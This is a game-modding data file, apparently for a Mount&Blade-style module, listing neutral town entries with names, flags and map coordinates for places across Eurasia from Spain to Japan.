("medinah", "Medinah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-203.04, -2.6), [], 90.0),
("sanaa", "Sanaa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-253.16, 91.88), [], 180.0),
("aswan", "Aswan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.8, 1.44), [], 270.0),
("asyut", "Asyut", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-108.98, -31.32), [], 75.0),
("tubruq", "Tubruq", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-31.56, -86.48), [], 195.0),
("amadabad", "Amadabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-243.52, -58.88), [], 95.0),
("abha", "Abha", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-234.8, 62.52), [], 95.0),
("arar", "Arar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-218.36, -73.84), [], 315.0),
("riyadh", "Jeddah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-198.96, -28.2), [], 95.0),
("riyadh", "Jeddah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-198.96, -28.2), [], 95.0),
("shah_kaka", "Shah Kaka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-209.36, -62.8), [], 40.0),
("beni_suef", "Beni suef", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-110.8, -52.4), [], 45.0),
("tabuk", "Tabuk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-169.76, -44.52), [], 180.0),
("tanta", "Tanta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-108.76, -71.76), [], 90.0),
("el_daba", "El Daba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-78.84, -74.76), [], 180.0),
("suez", "Suez", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-128.12, -64.5), [], 35.0),
("luxor", "Luxor", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-126.74, -14.58), [], 180.0),
("amman", "Amman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-163.08, -84.88), [], 260.0),
("adabiyah", "Adabiyah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.4, -71.72), [], 180.0),
("al_madiq", "Al madiq", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.12, -5.16), [], 55.0),
("buraydah", "Buraydah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-250.64, -22.8), [], 255.0),
("yanbu", "Yanbu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-187.6, 0.8), [], 45.0),
("aden", "Aden", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-261.56, 115.76), [], 45.0),
("tayma", "Tayma", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-191.12, -36.6), [], 270.0),
("derna", "Derna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-17.28, -94.08), [], 140.0),
("samalut", "Samalut", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.16, -44.18), []),
("wadi_addawasir", "Wadi addawasir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.6, 39.4), [], 185.0),
("hail", "Hail", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-225.64, -35.4), [], 80.0),
("deir_ez_zur", "Deir ez-zur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-208.48, -124.4), [], 45.0),
("samarkand", "Samarkand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-501.2, -177.2), [], 155.0),
("nishapur", "Nishapur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-412.68, -135.6), [], 80.0),
("kabul", "Kabul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-526.0, -114.88), [], 35.0),
("mazarisharif", "MazariSharif", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-503.84, -140.64), [], 245.0),
("taraz", "Taraz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-550.12, -218.92), [], 215.0),
("ashgabat", "Ashgabat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-407.84, -156.16), [], 45.0),
("aktau", "Aktau", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-330.72, -230.72), [], 115.0),
("baku", "Baku", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-314.8, -188.0), [], 95.0),
("bishukec", "Bishukec", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-585.04, -218.68), [], 10.0),
("tashkent", "Tashkent", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-526.684, -197.6), [], 160.0),
("urgench", "Urgench", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-429.88, -199.72), [], 40.0),
("shymkent", "Shymkent", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-530.72, -211.48), [], 20.0),
("mary", "Mary", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-445.8, -152.12), []),
("gizab", "Gizab", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-493.84, -102.56), [], 275.0),
("zhanaozen", "Zhanaozen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-347.84, -225.6), [], 175.0),
("shirvan", "Shirvan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-304.72, -181.32), [], 45.0),
("gdansk", "Gdansk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (26.0, -388.64), [], 120.0),
("poznan", "Poznan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (44.4, -357.2), [], 260.0),
("krakow", "Krakow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (11.6, -321.12), [], 260.0),
("warsaw", "Warsaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1.12, -348.12), [], 185.0),
("lublin", "Lublin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-17.2, -338.96), [], 180.0),
("szczecin", "Szczecin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (70.32, -374.08), [], 175.0),
("bialystok", "Bialystok", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-23.4, -368.8), []),
("rzeszow", "Rzeszow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-10.68, -320.0), []),
("bydgoszcz", "Bydgoszcz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (32.72, -368.48), [], 315.0),
("lodz", "Lodz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (16.76, -347.2), [], 100.0),
("wroclaw", "Wroclaw", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (43.24, -337.2), [], 100.0),
("opole", "Opole", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (33.72, -330.48), [], 260.0),
("gorzow", "Gorzow", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.84, -363.68), [], 115.0),
("elk", "Elk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-14.32, -379.48), [], 90.0),
("koszalin", "Koszalin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (53.04, -385.28), [], 255.0),
("olsztyn", "Olsztyn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (5.76, -377.08), []),
("kielce", "Kielce", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.24, -332.52), [], 155.0),
("konin", "Konin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (30.2, -354.04), [], 45.0),
("siedlce", "Siedlce", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-13.92, -352.8), [], 225.0),
("vilnius", "Vilnius", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-46.76, -394.76), [], 90.0),
("kaunas", "Kaunas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.0, -398.4), [], 15.0),
("kelme", "Kelme", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-14.0, -412.0), [], 10.0),
("hrodna", "Hrodna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-30.8, -377.28), [], 125.0),
("lida", "Lida", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-47.4, -381.12), [], 90.0),
("baranavichy", "Baranavichy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-54.56, -368.8), [], 45.0),
("siauliai", "Siauliai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-24.92, -416.4), [], 240.0),
("pinsk", "Pinsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-54.32, -352.72), [], 45.0),
("xuzhou", "Xuzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1054.78, -111.58), [], 290.0),
("pizhou", "Pizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.52, -112.88), [], 60.0),
("huaian", "Huaian", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1070.24, -104.72), [], 180.0),
("lianyungang", "Lianyungang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.76, -115.84), [], 45.0),
("linyi", "Linyi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1063.32, -121.76), [], 80.0),
("london", "London", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (230.48, -343.36), [], 180.0),
("bordeaux", "Bordeaux", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (238.22, -249.12), [], 255.0),
("york", "York", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.08, -382.72), [], 90.0),
("nante", "Nante", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (247.64, -280.22), [], 235.0),
("bristol", "Bristol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (257.48, -342.32), [], 260.0),
("chester", "Chester", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (259.2, -369.6), [], 90.0),
("bamber", "Bamber", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.8, -398.4), [], 45.0),
("dublin", "Dublin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.8, -372.4), [], 90.0),
("hastings", "Hastings", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (222.4, -334.8), [], 180.0),
("hawick", "Hawick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (259.6, -406.64), [], 280.0),
("portsmouth", "Portsmouth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.08, -333.16), [], 75.0),
("limoges", "Limoges", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (215.2, -259.0), [], 140.0),
("plymouth", "Plymouth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (274.76, -325.68), [], 65.0),
("norwich", "Norwich", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (215.8, -360.84), [], 125.0),
("northamton", "Northamton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (238.92, -353.4), [], 275.0),
("nottingham", "Nottingham", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.68, -366.08), [], 315.0),
("sheffield", "Sheffield", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (245.52, -373.36), [], 20.0),
("cardiff", "Cardiff", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (264.8, -343.4), [], 80.0),
("blackpool", "Blackpool", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.92, -379.72), [], 35.0),
("wolverhampton", "Wolverhampton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (253.12, -358.4), []),
("brest", "Brest", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.88, -293.64), [], 45.0),
("maan", "Maan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (278.88, -386.8), [], 20.0),
("derby", "Derby", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.24, -365.32), [], 55.0),
("southampton", "Southampton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (244.64, -334.0), [], 15.0),
("cahors", "Cahors", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (214.12, -242.12), [], 35.0),
("poitiers", "Poitiers", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (227.28, -272.08), [], 160.0),
("rennes", "Rennes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (247.12, -292.76), []),
("exeter", "Exeter", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (268.24, -330.72), [], 90.0),
("cambridge", "Cambridge", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (228.44, -352.44), [], 180.0),
("colchester", "Colchester", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (220.24, -349.88), [], 45.0),
("aberystwyth", "Aberystwyth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.28, -358.04), [], 315.0),
("dungannon", "Dungannon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (273.76, -398.2), [], 125.0),
("la_lochelle", "La lochelle", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.8, -264.24), [], 90.0),
("nanjing", "Nanjing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1068.96, -86.16), []),
("shaoxing", "Shaoxing", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.36, -63.8), [], 45.0),
("suzhou", "Suzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1087.68, -78.0), [], 225.0),
("shanghai", "Shanghai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1097.24, -77.32), [], 130.0),
("yizhou", "Yizhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1092.8, 2.4), [], 90.0),
("wenzhou", "Wenzhou", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1088.4, -39.86), [], 170.0),
("nanping", "Nanping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1061.24, -26.72), [], 80.0),
("yancheng", "Yancheng", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1082.72, -101.52), [], 110.0),
("ningbo", "Ningbo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1097.68, -62.0), [], 115.0),
("jinhua", "Jinhua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1077.16, -53.12), [], 45.0),
("shanyue", "Shanyue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1066.4, -66.28), [], 185.0),
("kyoto", "Kyoto", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1253.6, -121.08), [], 240.0),
("edo", "Edo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1296.4, -129.12), [], 90.0),
("nagasaki", "Nagasaki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1189.2, -95.2), [], 80.0),
("hiroshima", "Hiroshima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1216.8, -114.4), [], 260.0),
("osaka", "Osaka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1251.36, -115.58), [], 45.0),
("sendai", "Sendai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1309.24, -160.48), [], 125.0),
("nagano", "Nagano", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1280.4, -143.2), [], 45.0),
("tokushima", "Tokushima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1240.2, -109.52), [], 280.0),
("morioka", "Morioka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1312.44, -178.4), [], 90.0),
("fukuoka", "Fukuoka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1194.68, -104.76), [], 315.0),
("kagoshima", "Kagoshima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1196.28, -81.2), [], 125.0),
("matsuyama", "Matsuyama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1220.94, -106.92), [], 185.0),
("matsue", "Matsue", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1224.16, -125.32), [], 45.0),
("takayama", "Takayama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1271.38, -134.06), [], 155.0),
("utsunomiya", "Utsunomiya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1298.4, -139.32), [], 245.0),
("sapporo", "Sapporo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1314.8, -221.92), [], 120.0),
("kobayashi", "Kobayashi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1198.92, -84.56), [], 130.0),
("tottori", "Tottori", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1239.0, -126.28), [], 170.0),
("nagoya", "Nagoya", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1266.44, -122.92), [], 45.0),
("fukushima", "Fukushima", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1304.76, -153.8), [], 110.0),
("akita", "Akita", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1301.64, -178.88), [], 120.0),
("amami", "Amami", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1183.64, -44.12), [], 90.0),
("shizuoka", "Shizuoka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1281.6, -121.2), [], 180.0),
("katsuyama", "Katsuyama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1260.0, -133.48), [], 100.0),
("yamaguchi", "Yamaguchi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1206.4, -111.2), [], 45.0),
("aomori", "Aomori", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1307.92, -191.76), [], 45.0),
("oita", "Oita", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1207.8, -99.78), [], 25.0),
("miyazaki", "Miyazaki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1205.48, -85.04), [], 180.0),
("kochi", "Kochi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1228.76, -104.32), [], 85.0),
("okayama", "Okayama", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1233.16, -116.96), [], 315.0),
("niigata", "Niigata", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.18, -154.9), [], 255.0),
("maebashi", "Maebashi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1289.32, -137.24), []),
("ryukyu", "Ryukyu", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1167.2, -24.4), [], 145.0),
("gorgonac", "Gorgonac", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1036.4, -290.4), [], 55.0),
("olkhunuud", "Olkhunuud", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-978.4, -232.4), [], 25.0),
("khongirad", "Khongirad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.2, -268.68), [], 15.0),
("hulunber", "Hulunber", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1079.32, -306.68), [], 175.0),
("ulaanbaatar", "Ulaanbaatar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-938.04, -288.88), [], 275.0),
("khongirad_ger", "Khongirad ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-962.88, -298.24), [], 90.0),
("olkhunuud_ger", "Olkhunuud ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1026.28, -257.0), [], 170.0),
("hulunber_yurt", "Hulunber yurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1044.16, -313.92), [], 295.0),
("ulaanbaatar_yurt", "Ulaanbaatar yurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-923.6, -275.44), [], 25.0),
("gorgonac_ger", "Gorgonac ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-997.16, -310.36), [], 170.0),
("tola", "Tola", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-849.18, -297.1), [], 175.0),
("kyrgyz", "Kyrgyz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-871.92, -301.24), [], 80.0),
("oirats", "Oirats", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-759.6, -321.2), [], 115.0),
("kyzyl", "Kyzyl", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-803.08, -343.98), []),
("kyrgyz_ger", "Kyrgyz ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-858.4, -325.6), [], 170.0),
("tola_ger", "Tola ger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-834.1, -281.68), [], 170.0),
("zaysan", "Zaysan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-697.68, -282.48), [], 15.0),
("ulaangom", "Ulaangom", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-776.92, -321.96), [], 155.0),
("toledo", "Toledo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (274.0932, -180.8844), [], 170.0),
("sevilla", "Sevilla", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (294.4, -149.2), [], 260.0),
("murcia", "Murcia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (241.6, -157.0), [], 260.0),
